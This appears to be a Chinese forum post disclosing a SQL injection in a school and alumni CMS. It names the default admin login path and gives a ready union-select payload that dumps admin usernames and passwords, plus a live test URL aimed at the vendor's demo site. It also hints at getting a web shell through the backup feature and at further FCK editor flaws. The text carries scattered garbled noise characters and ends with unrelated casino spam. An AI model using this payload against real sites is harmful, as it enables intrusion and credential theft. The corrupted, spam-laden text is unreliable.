! ^9 s1 p. l1 D$ ?4.视频图片管理:一级分类,动态添加视频或者图片等信息
5.留言管理:对留言,修改,删除、回复等管理
, ^% p5 M0 Q* R4 y) ]/ R" ^$ Z2 y, @6.校友频道:包括校友资料excel导出、管理等功能
7.友情链接管理:二级分类，能建立不同种类的友情链接显示在首页
默认后台:admin/login.asp
官方演示:http://demo.001cms.net
源码下载地址:http://down.chinaz.com/soft/30187.htm
! j# j4 m! G1 P" G; s  KEXP:
# v# }3 g3 L% F" d( p2 Tunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
+ u9 \% v! h6 M4 k, v. J3 egetshell:后台有备份，你懂的
6 D. p, e/ d( B# U6 l另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多，我在这里就不说了。
1 `" V9 o; A4 e7 u7 z-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

casino slots
online casino canada
new online casino
slot machines